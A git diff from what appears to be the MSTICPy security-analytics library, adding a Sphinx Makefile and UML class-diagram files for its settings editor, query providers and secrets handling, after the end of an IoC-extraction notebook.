-   ],
-   "source": [
-    "input_df = data=process_tree.head(20)\n",
-    "output_df = ioc_extractor.extract(data=input_df, columns=['NewProcessName', 'CommandLine'])\n",
-    "# set the type of the SourceIndex column. In this case we are matching with the default numeric index.\n",
-    "output_df['SourceIndex'] = pd.to_numeric(output_df['SourceIndex'])\n",
-    "merged_df = pd.merge(left=input_df, right=output_df, how='outer', left_index=True, right_on='SourceIndex')\n",
-    "merged_df.head()"
-   ]
-  }
- ],
- "metadata": {
-  "celltoolbar": "Tags",
-  "hide_input": false,
-  "kernelspec": {
-   "display_name": "Python 3",
-   "language": "python",
-   "name": "python3"
-  },
-  "language_info": {
-   "codemirror_mode": {
-    "name": "ipython",
-    "version": 3
-   },
-   "file_extension": ".py",
-   "mimetype": "text/x-python",
-   "name": "python",
-   "nbconvert_exporter": "python",
-   "pygments_lexer": "ipython3",
-   "version": "3.6.5"
-  },
-  "toc": {
-   "base_numbering": 1,
-   "nav_menu": {
-    "height": "318.996px",
-    "width": "320.994px"
-   },
-   "number_sections": true,
-   "sideBar": true,
-   "skip_h1_title": false,
-   "title_cell": "Table of Contents",
-   "title_sidebar": "Contents",
-   "toc_cell": false,
-   "toc_position": {
-    "height": "calc(100% - 180px)",
-    "left": "10px",
-    "top": "150px",
-    "width": "165px"
-   },
-   "toc_section_display": true,
-   "toc_window_display": true
-  },
-  "varInspector": {
-   "cols": {
-    "lenName": 16,
-    "lenType": 16,
-    "lenVar": 40
-   },
-   "kernels_config": {
-    "python": {
-     "delete_cmd_postfix": "",
-     "delete_cmd_prefix": "del ",
-     "library": "var_list.py",
-     "varRefreshCmd": "print(var_dic_list())"
-    },
-    "r": {
-     "delete_cmd_postfix": ") ",
-     "delete_cmd_prefix": "rm(",
-     "library": "var_list.r",
-     "varRefreshCmd": "cat(var_dic_list()) "
-    }
-   },
-   "position": {
-    "height": "406.193px",
-    "left": "1468.4px",
-    "right": "20px",
-    "top": "120px",
-    "width": "456.572px"
-   },
-   "types_to_exclude": [
-    "module",
-    "function",
-    "builtin_function_or_method",
-    "instance",
-    "_Feature"
-   ],
-   "window_display": false
-  }
- },
- "nbformat": 4,
- "nbformat_minor": 2
-}
diff --git a/docs/Makefile b/docs/Makefile
new file mode 100644
index 000000000..69fe55ecf
--- /dev/null
+++ b/docs/Makefile
@@ -0,0 +1,19 @@
+# Minimal makefile for Sphinx documentation
+#
+
+# You can set these variables from the command line.
+SPHINXOPTS    =
+SPHINXBUILD   = sphinx-build
+SOURCEDIR     = source
+BUILDDIR      = build
+
+# Put it first so that "make" without argument is like "make help".
+help:
+	@$(SPHINXBUILD) -M help "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
+
+.PHONY: help Makefile
+
+# Catch-all target: route all unknown targets to Sphinx using the new
+# "make mode" option.  $(O) is meant as a shortcut for $(SPHINXOPTS).
+%: Makefile
+	@$(SPHINXBUILD) -M $@ "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
\ No newline at end of file
diff --git a/docs/diagrams/MPSettingsConfig.png b/docs/diagrams/MPSettingsConfig.png
new file mode 100644
index 000000000..852cbef4b
Binary files /dev/null and b/docs/diagrams/MPSettingsConfig.png differ
diff --git a/docs/diagrams/MSTICPy Settings.pyns b/docs/diagrams/MSTICPy Settings.pyns
new file mode 100644
index 000000000..ce63954b9
--- /dev/null
+++ b/docs/diagrams/MSTICPy Settings.pyns	
@@ -0,0 +1,77 @@
+# PynSource Version 1.2
+{'type':'meta', 'info1':'Lorem ipsum dolor sit amet, consectetur adipiscing elit is latin. Comments are saved.'}
+{'type':'umlshape', 'id':'CEAzureSentinel', 'x':739, 'y':88, 'width':160, 'height':346, 'attrs': '_COMP_PATH|_DESCRIPTION|_HELP_TEXT|_HELP_URI|_current_path|btn_set_default|current_workspace|edit_ctrls|edit_frame|select_item', 'meths': '__init__|_add_item|_del_item|_get_select_opts|_save_item|_select_labels|_select_provider|_set_default'}
+{'type':'umlshape', 'id':'CEItemsBase', 'x':1784, 'y':325, 'width':120, 'height':202, 'attrs': '_COMP_PATH|_DESCRIPTION|_HELP_TEXT|_HELP_URI|comp_defn|controls|mp_controls|settings', 'meths': '__init__'}
+{'type':'umlshape', 'id':'MpConfigControls', 'x':629, 'y':595, 'width':210, 'height':522, 'attrs': '_raw_config_defn|config_defn|controls|mp_config', 'meths': '__init__|_convert_mp_config|_convert_mp_config_dict|_convert_mp_config_list|_create_ctrl_dict|_del_elem_at_path|_get_ctrl_values|_get_elem_from_path|_set_ctrl_values|_set_elem_at_path|_unpack_lists|_validate_setting_at_path|_yml_extract_type|del_control|del_value|get_control|get_defn|get_value|populate_ctrl_values|rename_path|save_ctrl_values|set_control|set_value|validate_all_settings|validate_setting'}
+{'type':'umlshape', 'id':'CEDataProviders', 'x':1222, 'y':75, 'width':160, 'height':112, 'attrs': '_COMPONENT_HELP|_COMP_PATH|_DESCRIPTION|_HELP_URI', 'meths': ''}
+{'type':'umlshape', 'id':'CEProviders', 'x':1011, 'y':257, 'width':146, 'height':282, 'attrs': '_HELP_TEXT|_current_path|edit_ctrls|edit_frame|items_frame|prov_options|prov_settings_map|select_item', 'meths': '__init__|_add_provider|_del_provider|_get_select_opts|_save_provider|_select_provider'}
+{'type':'umlshape', 'id':'CEKeyVault', 'x':1226, 'y':449, 'width':122, 'height':186, 'attrs': '_COMP_PATH|_DESCRIPTION|_HELP_TEXT|_HELP_URI|controls|edit_frame', 'meths': '__init__|_save_settings'}
+{'type':'umlshape', 'id':'CESimpleBase', 'x':1797, 'y':760, 'width':130, 'height':202, 'attrs': '_COMP_PATH|_DESCRIPTION|_HELP_TEXT|_HELP_URI|comp_defn|controls|mp_controls|settings', 'meths': '__init__'}
+{'type':'umlshape', 'id':'CEOtherProviders', 'x':1221, 'y':203, 'width':170, 'height':96, 'attrs': '_COMP_PATH|_DESCRIPTION|_HELP_URI', 'meths': ''}
+{'type':'umlshape', 'id':'CETIProviders', 'x':1219, 'y':315, 'width':140, 'height':96, 'attrs': '_COMP_PATH|_DESCRIPTION|_HELP_URI', 'meths': ''}
+{'type':'umlshape', 'id':'CEAutoLoadQProvs', 'x':422, 'y':81, 'width':186, 'height':378, 'attrs': '_COMP_PATH|_DESCRIPTION|_HELP_TEXT|_HELP_URI|_current_path|edit_ctrls|edit_frame|items_frame|prov_options|select_item', 'meths': '__init__|_add_component|_del_component|_get_available_options|_get_default_values|_get_query_providers|_get_select_opts|_get_settings_ctrls|_save_component|_select_provider'}
+{'type':'umlshape', 'id':'CEAutoLoadComps', 'x':189, 'y':79, 'width':186, 'height':186, 'attrs': '_COMP_PATH|_DESCRIPTION|_HELP_TEXT|_HELP_URI', 'meths': '_get_available_options|_get_default_values|_get_select_opts|_get_settings_ctrls'}
+{'type':'umlshape', 'id':'CompEditDisplayMixin', 'x':1969, 'y':554, 'width':210, 'height':96, 'attrs': '', 'meths': '_ipython_display_|border_layout|no_border_layout'}
+{'type':'umlshape', 'id':'CompEditUtilsMixin', 'x':2271, 'y':317, 'width':190, 'height':64, 'attrs': '', 'meths': '_get_settings_path'}
+{'type':'umlshape', 'id':'CompEditStatusMixin', 'x':2001, 'y':1063, 'width':200, 'height':122, 'attrs': 'status|testing', 'meths': 'clear_status|set_status'}
+{'type':'umlshape', 'id':'CompEditHelp', 'x':2305, 'y':681, 'width':130, 'height':170, 'attrs': '_DEFAULT_URI|_HELP_STYLE|accdn_help|html_help|layout', 'meths': '__init__|set_help'}
+{'type':'umlshape', 'id':'CompEditTabs', 'x':2001, 'y':130, 'width':130, 'height':170, 'attrs': 'layout|tab|tab_controls|tab_names', 'meths': '__init__|add_tab|set_tab'}
+{'type':'umlshape', 'id':'CompEditFrame', 'x':2308, 'y':444, 'width':140, 'height':138, 'attrs': 'description|help|inner_frame|layout', 'meths': '__init__'}
+{'type':'umlshape', 'id':'CompEditItemButtons', 'x':2236, 'y':143, 'width':200, 'height':138, 'attrs': 'btn_add|btn_del|btn_save|layout', 'meths': '__init__'}
+{'type':'umlshape', 'id':'CompEditItems', 'x':1949, 'y':323, 'width':140, 'height':154, 'attrs': 'edit_buttons|edit_frame|inner_frame|items_frame|select_item', 'meths': '__init__'}
+{'type':'umlshape', 'id':'CompEditSimple', 'x':1977, 'y':732, 'width':150, 'height':138, 'attrs': 'btn_save|container|edit_frame|inner_frame', 'meths': '__init__'}
+{'type':'umlshape', 'id':'SettingsControl', 'x':20, 'y':622, 'width':160, 'height':90, 'attrs': 'value', 'meths': 'value'}
+{'type':'umlshape', 'id':'ArgControl', 'x':34, 'y':999, 'width':154, 'height':298, 'attrs': 'btn_add_kv_secret|cb_kv_def|hbox|kv_client|lbl_setting|name|rb_store_type|setting_path|txt_val|value', 'meths': '__init__|_change_store|_disable_txt|_set_kv_secret|_set_kv_visibility'}
+{'type':'umlshape', 'id':'UserDefQryProvCtrl', 'x':260, 'y':625, 'width':190, 'height':202, 'attrs': 'cb_connect|layout|lbl_type|prov_name|prov_type|txt_alias|value', 'meths': '__init__|_set_prov_name'}
+{'type':'umlshape', 'id':'UserDefLoadComponent', 'x':251, 'y':858, 'width':210, 'height':266, 'attrs': '_W_STYLE|comp_name|comp_path|control_map|controls|layout|value', 'meths': '__init__|_add_control_to_map|_create_controls|_create_select_ctrl|_get_val_from_ctrl|_set_ctrl_from_val'}
+{'type':'umlshape', 'id':'FileBrowser', 'x':1390, 'y':980, 'width':122, 'height':106, 'attrs': 'PARENT|current_folder', 'meths': '__init__'}
+{'type':'umlshape', 'id':'MpConfigFile', 'x':1334, 'y':795, 'width':130, 'height':90, 'attrs': 'settings', 'meths': '__init__'}
+{'type':'umlshape', 'id':'MpConfigEdit', 'x':1625, 'y':34, 'width':130, 'height':90, 'attrs': 'mp_conf_file', 'meths': '__init__'}
+{'type':'comment', 'id':'C2454', 'x':2047, 'y':49, 'width':200, 'height':35, 'comment': 'Rm9ybSBoZWxwZXIgY2xhc3Nlcw=='}
+{'type':'comment', 'id':'C2447', 'x':21, 'y':564, 'width':200, 'height':32, 'comment': 'Q29tcG91bmQgY29udHJvbHM='}
+{'type':'comment', 'id':'C8051', 'x':558, 'y':30, 'width':200, 'height':30, 'comment': 'U2V0dGluZ3MgZWRpdG9yIGNsYXNzZXM='}
+{'type':'comment', 'id':'C1840', 'x':1764, 'y':22, 'width':200, 'height':44, 'comment': 'TWFpbiBlZGl0b3IgY29udGFpbmVyCmNsYXNz'}
+{'type':'comment', 'id':'C455', 'x':1126, 'y':792, 'width':200, 'height':30, 'comment': 'U2V0dGluZ3MgZmlsZSBtYW5hZ2Vy'}
+{'type':'comment', 'id':'C8135', 'x':1180, 'y':982, 'width':200, 'height':26, 'comment': 'RmlsZSBicm93c2VyIHdpZGdldA=='}
+{'type':'comment', 'id':'C5146', 'x':846, 'y':836, 'width':200, 'height':27, 'comment': 'U2V0dGluZ3MgZGF0YWJhc2U='}
+{'type':'edge', 'id':'CEAzureSentinel_to_CEItemsBase', 'source':'CEAzureSentinel', 'target':'CEItemsBase', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'MpConfigControls_to_CEAzureSentinel', 'source':'MpConfigControls', 'target':'CEAzureSentinel', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'CEDataProviders_to_CEProviders', 'source':'CEDataProviders', 'target':'CEProviders', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'CEKeyVault_to_CESimpleBase', 'source':'CEKeyVault', 'target':'CESimpleBase', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'MpConfigControls_to_CEKeyVault', 'source':'MpConfigControls', 'target':'CEKeyVault', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'CEOtherProviders_to_CEProviders', 'source':'CEOtherProviders', 'target':'CEProviders', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'CEProviders_to_CEItemsBase', 'source':'CEProviders', 'target':'CEItemsBase', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'MpConfigControls_to_CEProviders', 'source':'MpConfigControls', 'target':'CEProviders', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'CETIProviders_to_CEProviders', 'source':'CETIProviders', 'target':'CEProviders', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'CEAutoLoadQProvs_to_CEItemsBase', 'source':'CEAutoLoadQProvs', 'target':'CEItemsBase', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'CEAutoLoadComps_to_CEAutoLoadQProvs', 'source':'CEAutoLoadComps', 'target':'CEAutoLoadQProvs', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'MpConfigControls_to_CEAutoLoadQProvs', 'source':'MpConfigControls', 'target':'CEAutoLoadQProvs', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'CompEditSimple_to_CompEditFrame', 'source':'CompEditSimple', 'target':'CompEditFrame', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'CESimpleBase_to_CompEditSimple', 'source':'CESimpleBase', 'target':'CompEditSimple', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'CompEditItems_to_CompEditFrame', 'source':'CompEditItems', 'target':'CompEditFrame', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'CEItemsBase_to_CompEditItems', 'source':'CEItemsBase', 'target':'CompEditItems', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'CompEditFrame_to_CompEditDisplayMixin', 'source':'CompEditFrame', 'target':'CompEditDisplayMixin', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'CompEditFrame_to_CompEditStatusMixin', 'source':'CompEditFrame', 'target':'CompEditStatusMixin', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'CompEditFrame_to_CompEditUtilsMixin', 'source':'CompEditFrame', 'target':'CompEditUtilsMixin', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'CompEditHelp_to_CompEditFrame', 'source':'CompEditHelp', 'target':'CompEditFrame', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'CompEditItemButtons_to_CompEditItems', 'source':'CompEditItemButtons', 'target':'CompEditItems', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'UserDefQryProvCtrl_to_SettingsControl', 'source':'UserDefQryProvCtrl', 'target':'SettingsControl', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'ArgControl_to_CompEditStatusMixin', 'source':'ArgControl', 'target':'CompEditStatusMixin', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'ArgControl_to_SettingsControl', 'source':'ArgControl', 'target':'SettingsControl', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'UserDefLoadComponent_to_SettingsControl', 'source':'UserDefLoadComponent', 'target':'SettingsControl', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'MpConfigControls_to_UserDefLoadComponent', 'source':'MpConfigControls', 'target':'UserDefLoadComponent', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'FileBrowser_to_CompEditDisplayMixin', 'source':'FileBrowser', 'target':'CompEditDisplayMixin', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'MpConfigFile_to_CompEditStatusMixin', 'source':'MpConfigFile', 'target':'CompEditStatusMixin', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'MpConfigFile_to_CompEditDisplayMixin', 'source':'MpConfigFile', 'target':'CompEditDisplayMixin', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'MpConfigEdit_to_CompEditDisplayMixin', 'source':'MpConfigEdit', 'target':'CompEditDisplayMixin', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'MpConfigFile_to_MpConfigEdit', 'source':'MpConfigFile', 'target':'MpConfigEdit', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'CompEditTabs_to_MpConfigEdit', 'source':'CompEditTabs', 'target':'MpConfigEdit', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'FileBrowser_to_MpConfigFile', 'source':'FileBrowser', 'target':'MpConfigFile', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'FileBrowser_to_MpConfigEdit', 'source':'FileBrowser', 'target':'MpConfigEdit', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'CETIProviders_to_MpConfigEdit', 'source':'CETIProviders', 'target':'MpConfigEdit', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'CEOtherProviders_to_MpConfigEdit', 'source':'CEOtherProviders', 'target':'MpConfigEdit', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'CEDataProviders_to_MpConfigEdit', 'source':'CEDataProviders', 'target':'MpConfigEdit', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'CEAzureSentinel_to_MpConfigEdit', 'source':'CEAzureSentinel', 'target':'MpConfigEdit', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'CEAutoLoadQProvs_to_MpConfigEdit', 'source':'CEAutoLoadQProvs', 'target':'MpConfigEdit', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'CEAutoLoadComps_to_MpConfigEdit', 'source':'CEAutoLoadComps', 'target':'MpConfigEdit', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'CEKeyVault_to_MpConfigEdit', 'source':'CEKeyVault', 'target':'MpConfigEdit', 'uml_edge_type': 'composition'}
diff --git a/docs/diagrams/QueryProvider.png b/docs/diagrams/QueryProvider.png
new file mode 100644
index 000000000..fd4677a5a
Binary files /dev/null and b/docs/diagrams/QueryProvider.png differ
diff --git a/docs/diagrams/QueryProvider.pyns b/docs/diagrams/QueryProvider.pyns
new file mode 100644
index 000000000..4c951bc21
--- /dev/null
+++ b/docs/diagrams/QueryProvider.pyns
@@ -0,0 +1,31 @@
+# PynSource Version 1.2
+{'type':'meta', 'info1':'Lorem ipsum dolor sit amet, consectetur adipiscing elit is latin. Comments are saved.'}
+{'type':'umlshape', 'id':'QueryProvider', 'x':633, 'y':10, 'width':170, 'height':362, 'attrs': 'connected|connection_string|schema_tables|_query_provider|_environment|all_queries|schema|_query_store', 'meths': 'list_queries|get_query|exec_query|__getattr__|connect|import_query_file|_add_service_queries|_execute_query|query_help|__init__|_add_query_functions'}
+{'type':'umlshape', 'id':'QueryContainer', 'x':329, 'y':140, 'width':150, 'height':128, 'attrs': '', 'meths': '__repr__|__getattr__|__iter__|__call__|__len__'}
+{'type':'umlshape', 'id':'DataFamily', 'x':567, 'y':946, 'width':154, 'height':192, 'attrs': 'Unknown|MDATP|AzureNetwork|SecurityAlert|LinuxSyslog|SecurityGraphAlert|LinuxSecurity|Splunk|WindowsSecurity', 'meths': ''}
+{'type':'umlshape', 'id':'DataEnvironment', 'x':323, 'y':943, 'width':162, 'height':192, 'attrs': 'Unknown|LogAnalytics|Kusto|LocalData|MDATP|SecurityGraph|AzureSecurityCenter|Splunk|AzureSentinel', 'meths': ''}
+{'type':'umlshape', 'id':'QueryParamProvider', 'x':810, 'y':1069, 'width':190, 'height':64, 'attrs': 'query_params', 'meths': ''}
+{'type':'umlshape', 'id':'QuerySource', 'x':811, 'y':560, 'width':178, 'height':330, 'attrs': 'required_params|metadata|data_families|params|default_params|name|query|description|_query', 'meths': '_replace_query_macros|_convert_datetime|validate|__getitem__|help|create_query|create_doc_string|__init__'}
+{'type':'umlshape', 'id':'QueryStore', 'x':581, 'y':561, 'width':130, 'height':218, 'attrs': 'query_names|data_families', 'meths': '__init__|__getattr__|__getitem__|add_data_source|add_query|import_file|get_query|find_query'}
+{'type':'umlshape', 'id':'DriverBase', 'x':1276, 'y':105, 'width':154, 'height':202, 'attrs': 'schema|current_connection|connected|service_queries|_kwargs|_connected|_loaded|loaded', 'meths': '__init__'}
+{'type':'umlshape', 'id':'KqlDriver', 'x':1800, 'y':579, 'width':162, 'height':378, 'attrs': 'schema|_TEN_RGX|_ip|formatters|current_connection|_debug|_connected|_WS_RGX|_schema|_loaded', 'meths': 'query_with_results|_get_schema|_set_kql_option|connect|_is_kqlmagic_loaded|_raise_kql_error|_get_kql_option|_load_kql_magic|query|__init__'}
+{'type':'umlshape', 'id':'LocalDataDriver', 'x':1186, 'y':585, 'width':160, 'height':234, 'attrs': 'schema|_paths|_connected|_debug|_schema|_loaded', 'meths': 'query_with_results|_get_data_paths|connect|query|__init__'}
+{'type':'umlshape', 'id':'MDATPDriver', 'x':1511, 'y':957, 'width':154, 'height':170, 'attrs': 'api_root|oauth_url|current_connection|req_body|api_ver', 'meths': 'query|__init__'}
+{'type':'umlshape', 'id':'OData', 'x':1382, 'y':587, 'width':154, 'height':218, 'attrs': 'api_root|current_connection|aad_token|_debug|_connected|req_headers|_loaded', 'meths': 'query_with_results|connect|__init__'}
+{'type':'umlshape', 'id':'SecurityGraphDriver', 'x':1280, 'y':959, 'width':200, 'height':170, 'attrs': 'api_root|oauth_url|current_connection|req_body|api_ver', 'meths': 'query|__init__'}
+{'type':'umlshape', 'id':'SplunkDriver', 'x':1591, 'y':585, 'width':162, 'height':346, 'attrs': '_fired_alerts|public_attribs|formatters|service_queries|_SPLUNK_REQD_ARGS|_connected|service|_debug|_saved_searches|_loaded|_TIME_FORMAT', 'meths': 'query_with_results|connect|_get_fired_alerts|_get_connect_args|_get_saved_searches|query|__init__'}
+{'type':'umlshape', 'id':'data_query_reader[MOD]', 'x':256, 'y':644, 'width':230, 'height':96, 'attrs': '', 'meths': 'find_yaml_files|read_query_def_file|validate_query_defs'}
+{'type':'umlshape', 'id':'param_extractor[MOD]', 'x':270, 'y':456, 'width':210, 'height':80, 'attrs': '', 'meths': 'extract_query_params|_get_object_params'}
+{'type':'edge', 'id':'QueryContainer_to_QueryProvider', 'source':'QueryContainer', 'target':'QueryProvider', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'QuerySource_to_QueryStore', 'source':'QuerySource', 'target':'QueryStore', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'DataFamily_to_QueryStore', 'source':'DataFamily', 'target':'QueryStore', 'uml_edge_type': 'association'}
+{'type':'edge', 'id':'QueryStore_to_QueryProvider', 'source':'QueryStore', 'target':'QueryProvider', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'KqlDriver_to_DriverBase', 'source':'KqlDriver', 'target':'DriverBase', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'LocalDataDriver_to_DriverBase', 'source':'LocalDataDriver', 'target':'DriverBase', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'MDATPDriver_to_OData', 'source':'MDATPDriver', 'target':'OData', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'OData_to_DriverBase', 'source':'OData', 'target':'DriverBase', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'SecurityGraphDriver_to_OData', 'source':'SecurityGraphDriver', 'target':'OData', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'SplunkDriver_to_DriverBase', 'source':'SplunkDriver', 'target':'DriverBase', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'DriverBase_to_QueryProvider', 'source':'DriverBase', 'target':'QueryProvider', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'param_extractor[MOD]_to_QueryProvider', 'source':'param_extractor[MOD]', 'target':'QueryProvider', 'uml_edge_type': 'association'}
+{'type':'edge', 'id':'data_query_reader[MOD]_to_QueryStore', 'source':'data_query_reader[MOD]', 'target':'QueryStore', 'uml_edge_type': 'association'}
diff --git a/docs/diagrams/Secrets and Settings.pyns b/docs/diagrams/Secrets and Settings.pyns
new file mode 100644
index 000000000..165fc731e
--- /dev/null
+++ b/docs/diagrams/Secrets and Settings.pyns	
@@ -0,0 +1,29 @@
+# PynSource Version 1.2
+{'type':'meta', 'info1':'Lorem ipsum dolor sit amet, consectetur adipiscing elit is latin. Comments are saved.'}
+{'type':'umlshape', 'id':'KeyVaultSettings', 'x':977, 'y':613, 'width':210, 'height':314, 'attrs': 'CLIENT_ID|cloud|authority_uri|mgmt_uri|KV_URIS|keyvault_uri|MGMT_URIS|AAD_AUTHORITIES|__dict__', 'meths': 'get_tenant_authority_host|get_tenant_authority_uri|__setitem__|__getitem__|get|__init__|__contains__'}
+{'type':'umlshape', 'id':'AuthClient', 'x':344, 'y':125, 'width':186, 'height':394, 'attrs': '_expired_creds|authority_uri|auth_id|tenant_id|client_id|client_uri|user_oid|debug|config_data|name|authority|_expires_on|token', 'meths': '_get_creds|_get_token|_is_valid_config_data|_refresh_creds|_get_parsed_token_data|_cache_creds|_adal_callback|__init__'}
+{'type':'umlshape', 'id':'KeyringAuthClient', 'x':92, 'y':324, 'width':180, 'height':154, 'attrs': 'config_data|name|keyring', 'meths': '_get_creds|_cache_creds|__init__'}
+{'type':'umlshape', 'id':'BHKeyVaultClient', 'x':722, 'y':890, 'width':170, 'height':266, 'attrs': '_KEYRING_NAME|debug|tenant_id|authn_type|settings|authority_uri|vault_uri|kv_client|secrets', 'meths': '__init__|_get_secret_client|get_secret|set_secret'}
+{'type':'umlshape', 'id':'BHKeyVaultMgmtClient', 'x':622, 'y':127, 'width':210, 'height':250, 'attrs': 'resource_group|subscription_id|tenant_id|azure_region|auth_client|debug|_client_uri', 'meths': 'create_vault|list_vaults|_get_params|get_vault_uri|__init__'}
+{'type':'umlshape', 'id':'ProviderArgs', 'x':1673, 'y':725, 'width':130, 'height':64, 'attrs': '', 'meths': '__getitem__'}
+{'type':'umlshape', 'id':'ProviderSettings', 'x':1622, 'y':539, 'width':170, 'height':128, 'attrs': 'name|description|provider|args|primary', 'meths': ''}
+{'type':'umlshape', 'id':'KeyringClient', 'x':373, 'y':968, 'width':140, 'height':170, 'attrs': 'debug|keyring|_secret_names', 'meths': '__getitem__|get_secret|__init__|set_secret'}
+{'type':'umlshape', 'id':'SecretsClient', 'x':362, 'y':627, 'width':186, 'height':234, 'attrs': '_use_keyring|tenant_id|_kv_settings|kv_secret_vault|kv_vaults|_keyring_client', 'meths': '_get_secret_func|__init__|_add_key_vault|_get_kv_vault_and_name|get_secret_accessor'}
+{'type':'umlshape', 'id':'WorkspaceConfig', 'x':1825, 'y':101, 'width':194, 'height':426, 'attrs': 'TENANT_ID|SUBSCRIPTION_ID|RESOURCE_GROUP|WORKSPACE_ID|WORKSPACE_NAME|PKG_CONF_TENANT_KEY|PKG_CONF_WS_KEY|CONF_WS_ID_KEY|CONF_TENANT_ID_KEY|CONF_SUB_ID_KEY|CONF_RES_GROUP_KEY|CONF_WS_NAME_KEY|_config_file|_config|config_loaded|code_connect_str', 'meths': '__init__|__getitem__|__setitem__|__contains__|__repr__|_read_pkg_config_values|_search_for_file'}
+{'type':'umlshape', 'id':'pkg_config [MOD]', 'x':1447, 'y':101, 'width':170, 'height':186, 'attrs': 'default_settings|custom_settings|settings', 'meths': 'current_config_path|_get_current_config|refresh_config|set_config|validate_config'}
+{'type':'umlshape', 'id':'provider_settings [MOD]', 'x':1437, 'y':382, 'width':240, 'height':106, 'attrs': '_SECRETS_CLIENT', 'meths': 'get_provider_settings|reload_settings'}
+{'type':'comment', 'id':'C3215', 'x':1227, 'y':50, 'width':200, 'height':37, 'comment': 'U2V0dGluZ3MgaW5mcmFzdHJ1Y3R1cmU='}
+{'type':'comment', 'id':'C7546', 'x':87, 'y':86, 'width':200, 'height':34, 'comment': 'VmF1bHQgbWFuYWdlbWVudA=='}
+{'type':'comment', 'id':'C9602', 'x':615, 'y':596, 'width':200, 'height':34, 'comment': 'U2VjcmV0cyBtYW5hZ2VtZW50'}
+{'type':'edge', 'id':'KeyringAuthClient_to_AuthClient', 'source':'KeyringAuthClient', 'target':'AuthClient', 'uml_edge_type': 'generalisation'}
+{'type':'edge', 'id':'AuthClient_to_BHKeyVaultMgmtClient', 'source':'AuthClient', 'target':'BHKeyVaultMgmtClient', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'KeyringClient_to_SecretsClient', 'source':'KeyringClient', 'target':'SecretsClient', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'KeyVaultSettings_to_SecretsClient', 'source':'KeyVaultSettings', 'target':'SecretsClient', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'BHKeyVaultClient_to_SecretsClient', 'source':'BHKeyVaultClient', 'target':'SecretsClient', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'WorkspaceConfig_to_pkg_config [MOD]', 'source':'WorkspaceConfig', 'target':'pkg_config [MOD]', 'uml_edge_type': 'association'}
+{'type':'edge', 'id':'ProviderArgs_to_ProviderSettings', 'source':'ProviderArgs', 'target':'ProviderSettings', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'ProviderSettings_to_provider_settings [MOD]', 'source':'ProviderSettings', 'target':'provider_settings [MOD]', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'pkg_config [MOD]_to_provider_settings [MOD]', 'source':'pkg_config [MOD]', 'target':'provider_settings [MOD]', 'uml_edge_type': 'association'}
+{'type':'edge', 'id':'KeyVaultSettings_to_BHKeyVaultMgmtClient', 'source':'KeyVaultSettings', 'target':'BHKeyVaultMgmtClient', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'KeyVaultSettings_to_BHKeyVaultClient', 'source':'KeyVaultSettings', 'target':'BHKeyVaultClient', 'uml_edge_type': 'composition'}
+{'type':'edge', 'id':'pkg_config [MOD]_to_KeyVaultSettings', 'source':'pkg_config [MOD]', 'target':'KeyVaultSettings', 'uml_edge_type': 'association'}
diff --git a/docs/diagrams/SecretsAndSettings.png b/docs/diagrams/SecretsAndSettings.png
new file mode 100644
index 000000000..e13234da0
Binary files /dev/null and b/docs/diagrams/SecretsAndSettings.png differ
diff --git a/docs/diagrams/TIProvider.png b/docs/diagrams/TIProvider.png
new file mode 100644
index 000000000..99f2b279a
